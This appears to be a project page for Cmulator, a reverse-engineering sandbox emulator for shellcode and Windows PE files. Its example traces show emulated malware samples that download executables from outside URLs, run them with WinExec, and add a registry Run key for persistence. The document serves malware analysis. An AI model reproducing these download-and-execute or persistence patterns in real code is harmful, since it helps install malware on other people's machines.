Cmulator – Scriptable x86 RE Sandbox Emulator

Cmulator is ( x86 – x64 ) Scriptable Reverse Engineering Sandbox Emulator for shellcode and PE binaries Based on Unicorn & Capstone Engine & javascript.

Supported Architectures:

i386
x86-64

Supported File Formats

PE, PE+
shellcodes

Current Features

Simulated GDT & Segments.
Simulated TEB & PEB structures for both Shellcodes and PE.
Simulated LDR Table & Data.
Manages Image and Stack memory.
Evaluates functions based on DLL exports.
Trace all Executed API ( good for Obfuscated PE).
Displays HexDump with Strings based on referenced memory locations.
Patching the Memory.
Custome API hooks using Javascript (scripting).
Handle SEH (still, need more work).
[+] Hook Address.

Example Output :

AntiDebug Downloader

Coldzer0 @ OSX $./Cmulator -f ../../samples/AntiDebugDownloader.exe -q



Cmulator Malware Analyzer - By Coldzer0



Compiled on      : 2018/09/29 - 01:51:51

Target CPU       : i386 & x86_x64

Unicorn Engine   : v1.0 

Cmulator         : v0.1



"AntiDebugDownloader.exe" is : x32

Mapping the File ..



[+] Unicorn Init done  .

[√] Set Hooks

[√] PE Mapped to Unicorn

[√] PE Written to Unicorn



[---------------- PE Info --------------]

[*] File Name        : AntiDebugDownloader.exe

[*] Image Base       : 0000000000400000

[*] Address Of Entry : 0000000000001000

[*] Size Of Headers  : 0000000000000400

[*] Size Of Image    : 0000000000004000

[---------------------------------------]



[---------------------------------------]

[            Fixing PE Imports          ]



[*] File Name  : AntiDebugDownloader.exe

[*] Import 3 Dlls



[+] Fix IAT for : kernel32.dll



[+] Fix IAT for : urlmon.dll



[+] Fix IAT for : advapi32.dll



[---------------------------------------]



[+] Segments & (TIB - PEB) Init Done .



[+] Loading JS Main Script : ../API.JS



Initiating 52 Libraries ...



[>] Run AntiDebugDownloader.exe



0x401005 : IsDebuggerPresent = 0

GetWindowsDirectoryA(403000, 260) = 10 - 'C:\Windows' 

0x40103d : URLDownloadToFileA(0, 'https://www.dropbox.com/s/fr3z6axblxfcmq8/UrlDownLoadtoFile.exe?dl=0', 'C:\Windows', 0, 0)

0x401051 : RegCreateKeyA(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run', 0x403159) = 144

0x40106f : RegSetValueExA(144, 'ransomware', 0, REG_SZ, 'C:\Windows', 260)

0x40107a : RegCloseKey()

ExitProcess(0x0)



26 Branches - Executed in 9 ms



Cmulator Stop >> last Error : OK (UC_ERR_OK)







Press Enter to Close ¯\_(ツ)_/¯

x64 Down & Exec ShellCode

Coldzer0 @ OSX $./Cmulator -f ../../samples/Shellcodes/down_exec64.sc -sc -x64



Cmulator Malware Analyzer - By Coldzer0



Compiled on      : 2018/09/29 - 03:07:11

Target CPU       : i386 & x86_x64

Unicorn Engine   : v1.0 

Cmulator         : v0.1



"sc64.exe" is : x64

Mapping the File ..



[+] Unicorn Init done  .

[√] Set Hooks

[√] PE Mapped to Unicorn

[√] PE Written to Unicorn



[---------------- PE Info --------------]

[*] File Name        : sc64.exe

[*] Image Base       : 0000000000400000

[*] Address Of Entry : 0000000000001000

[*] Size Of Headers  : 0000000000000400

[*] Size Of Image    : 0000000000002000

[---------------------------------------]

[*] Writing Shellcode to memory ...

[√] Shellcode Written to Unicorn



[---------------------------------------]

[            Fixing PE Imports          ]



[*] File Name  : sc64.exe

[*] Import 0 Dlls



[---------------------------------------]



[+] Segments & (TIB - PEB) Init Done .



[+] Loading JS Main Script : ../API.JS



Initiating 25 Libraries ...



[>] Run sc64.exe



LoadLibraryA('urlmon') = 0x70714000

GetProcAddress(0x70714000,'URLDownloadToFileA') = 0x707ADB10

0x40111b : URLDownloadToFileA(0, 'http://192.168.10.129/pl.exe', 'C:\\Users\\Public\\p.exe', 0, 2489880)

SetFileAttributesA('C:\\Users\\Public\\p.exe',0x2)

WinExec('C:\\Users\\Public\\p.exe', 0)

FatalExit(0x0)



95 Steps - Executed in 295 ms



Cmulator Stop >> last Error : OK (UC_ERR_OK)







Press Enter to Close ¯\_(ツ)_/¯

x32 Down & Exec ShellCode

Coldzer0 @ OSX $./Cmulator -f ../../samples/Shellcodes/URLDownloadToFile.sc -sc



Cmulator Malware Analyzer - By Coldzer0



Compiled on      : 2018/09/29 - 03:07:11

Target CPU       : i386 & x86_x64

Unicorn Engine   : v1.0 

Cmulator         : v0.1



"sc32.exe" is : x32

Mapping the File ..



[+] Unicorn Init done  .

[√] Set Hooks

[√] PE Mapped to Unicorn

[√] PE Written to Unicorn



[---------------- PE Info --------------]

[*] File Name        : sc32.exe

[*] Image Base       : 0000000000400000

[*] Address Of Entry : 0000000000001000

[*] Size Of Headers  : 0000000000000400

[*] Size Of Image    : 0000000000002000

[---------------------------------------]

[*] Writing Shellcode to memory ...

[√] Shellcode Written to Unicorn



[---------------------------------------]

[            Fixing PE Imports          ]



[*] File Name  : sc32.exe

[*] Import 0 Dlls



[---------------------------------------]



[+] Segments & (TIB - PEB) Init Done .



[+] Loading JS Main Script : ../API.JS



Initiating 25 Libraries ...



[>] Run sc32.exe



GetProcAddress(0x70300000,'LoadLibraryA') = 0x703149D7

LoadLibraryA('urlmon.dll') = 0x7065a000

GetProcAddress(0x7065A000,'URLDownloadToFileA') = 0x706F08D0

GetProcAddress(0x70300000,'WinExec') = 0x70392C21

0x40113b : URLDownloadToFileA(0, 'https://rstforums.com/fisiere/dead.exe', 'dead.exe', 0, 0)

WinExec('dead.exe', 1)



3041 Steps - Executed in 415 ms



Cmulator Stop >> last Error : OK (UC_ERR_OK)







Press Enter to Close ¯\_(ツ)_/¯

Show SEH handling (PELock Obfuscator)

Coldzer0 @ OSX $./Cmulator -f ../../samples/obfuscated/obfuscated.exe -ex



Cmulator Malware Analyzer - By Coldzer0



Compiled on      : 2018/09/29 - 03:07:11

Target CPU       : i386 & x86_x64

Unicorn Engine   : v1.0 

Cmulator         : v0.1



"obfuscated.exe" is : x32

Mapping the File ..



[+] Unicorn Init done  .

[√] Set Hooks

[√] PE Mapped to Unicorn

[√] PE Written to Unicorn



[---------------- PE Info --------------]

[*] File Name        : obfuscated.exe

[*] Image Base       : 0000000000400000

[*] Address Of Entry : 000000000000A4BD

[*] Size Of Headers  : 0000000000001000

[*] Size Of Image    : 000000000000F000

[---------------------------------------]



[---------------------------------------]

[            Fixing PE Imports          ]



[*] File Name  : obfuscated.exe

[*] Import 2 Dlls



[+] Fix IAT for : KERNEL32.dll



[+] Fix IAT for : USER32.dll



[---------------------------------------]



[+] Segments & (TIB - PEB) Init Done .



[+] Loading JS Main Script : ../API.JS



Initiating 44 Libraries ...



[>] Run obfuscated.exe



EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 1, data value = 0x0

0x403031 Exception caught SEH 0x25FEEC - Handler 0x409215

ZwContinue -> Context = 0x25F97C

EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0

0x4056EC Exception caught SEH 0x25FEE8 - Handler 0x402516

ZwContinue -> Context = 0x25F978

EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0

0x401974 Exception caught SEH 0x25FEE4 - Handler 0x4019CE

ZwContinue -> Context = 0x25F974

MessageBoxA(0, 'Hello world', 'Visit us at www.pelock.com', 64)

EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0

0x403A49 Exception caught SEH 0x25FEF4 - Handler 0x40A17B

ZwContinue -> Context = 0x25F984

EXCEPTION_ACCESS_VIOLATION READ_UNMAPPED : addr 0x0, data size = 4, data value = 0x0

0x40AD64 Exception caught SEH 0x25FEF4 - Handler 0x40B461

ZwContinue -> Context = 0x25F984

ExitProcess(0x0)



7387 Steps - Executed in 118 ms



Cmulator Stop >> last Error : OK (UC_ERR_OK)







Press Enter to Close ¯\_(ツ)_/¯

Hide SEH handling (PELock Obfuscator)

Coldzer0 @ OSX $./Cmulator -f ../../samples/obfuscated/obfuscated.exe 



Cmulator Malware Analyzer - By Coldzer0



Compiled on      : 2018/09/29 - 03:07:11

Target CPU       : i386 & x86_x64

Unicorn Engine   : v1.0 

Cmulator         : v0.1



"obfuscated.exe" is : x32

Mapping the File ..



[+] Unicorn Init done  .

[√] Set Hooks

[√] PE Mapped to Unicorn

[√] PE Written to Unicorn



[---------------- PE Info --------------]

[*] File Name        : obfuscated.exe

[*] Image Base       : 0000000000400000

[*] Address Of Entry : 000000000000A4BD

[*] Size Of Headers  : 0000000000001000

[*] Size Of Image    : 000000000000F000

[---------------------------------------]



[---------------------------------------]

[            Fixing PE Imports          ]



[*] File Name  : obfuscated.exe

[*] Import 2 Dlls



[+] Fix IAT for : KERNEL32.dll



[+] Fix IAT for : USER32.dll



[---------------------------------------]



[+] Segments & (TIB - PEB) Init Done .



[+] Loading JS Main Script : ../API.JS



Initiating 44 Libraries ...



[>] Run obfuscated.exe



MessageBoxA(0, 'Hello world', 'Visit us at www.pelock.com', 64)

ExitProcess(0x0)



7387 Steps - Executed in 116 ms



Cmulator Stop >> last Error : OK (UC_ERR_OK)







Press Enter to Close ¯\_(ツ)_/¯

Changelog v0.2.1 beta

No new features, Just a fix for Apisetschema forwarder.

Install

Tags: Cmulator